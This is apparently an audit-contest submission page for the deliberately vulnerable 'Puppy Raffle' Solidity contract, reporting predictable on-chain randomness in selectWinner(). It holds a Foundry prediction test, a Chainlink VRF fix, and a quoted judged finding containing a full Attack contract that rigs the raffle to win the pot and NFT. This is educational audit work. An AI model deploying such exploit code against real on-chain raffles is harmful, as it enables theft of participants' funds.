Puppy Raffle

AI First Flight #1

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Weak Randomness Allows Winner Prediction and Manipulation

quangviet910

Root + Impact

Description

The selectWinner() function in PuppyRaffle.sol:125-128 uses predictable on-chain values (msg.sender, block.timestamp, block.difficulty) to generate random numbers for winner selection and NFT rarity.
Explain the specific issue or problem in one or more sentences

uint256 winnerIndex = uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

uint256 rarity = uint256(keccak256(abi.encodePacked(msg.sender, block.difficulty))) % 100;

Risk

Likelihood:

Any participant can precalculate the winning index before calling `selectWinner()` since all inputs are known on-chain.
An attacker simply waits for a block where they would win, then submits the transaction. Miners have additional power to manipulate `block.timestamp` and choose which blocks to publish.

Impact:

The attacker guarantees winning every raffle they participate in by only calling `selectWinner()` when the calculation favors them.
They can also manipulate the rarity calculation to always mint legendary NFTs worth significantly more than common ones. This destroys the fairness of the raffle system.

Proof of Concept

The attacker precalculates the winner using the same formula the contract uses, then only calls `selectWinner()` when they would be selected.

contract PuppyRaffleTest is Test {

// ...existing code...

function testWeakRandomness() public playersEntered {

vm.warp(block.timestamp + duration + 1);

vm.roll(block.number + 1);

// Attacker precalculates winning index using same formula

uint256 predictedWinnerIndex = uint256(

keccak256(abi.encodePacked(address(this), block.timestamp, block.difficulty))

) % 4;

address predictedWinner = puppyRaffle.players(predictedWinnerIndex);

// Execute selectWinner

puppyRaffle.selectWinner();

// Prediction is always correct

assertEq(puppyRaffle.previousWinner(), predictedWinner);

}

Recommended Mitigation

Use Chainlink VRF (Verifiable Random Function) for secure randomness, or implement a commit-reveal scheme.

+import "@chainlink/contracts/src/v0.7/VRFConsumerBase.sol";

-contract PuppyRaffle is ERC721, Ownable {

+contract PuppyRaffle is ERC721, Ownable, VRFConsumerBase {

function selectWinner() external {

- uint256 winnerIndex = uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

+ requestRandomness(keyHash, fee);

}

+ function fulfillRandomness(bytes32 requestId, uint256 randomness) internal override {

+ uint256 winnerIndex = randomness % players.length;

+ // ... rest of winner selection logic

+ }

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 24 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!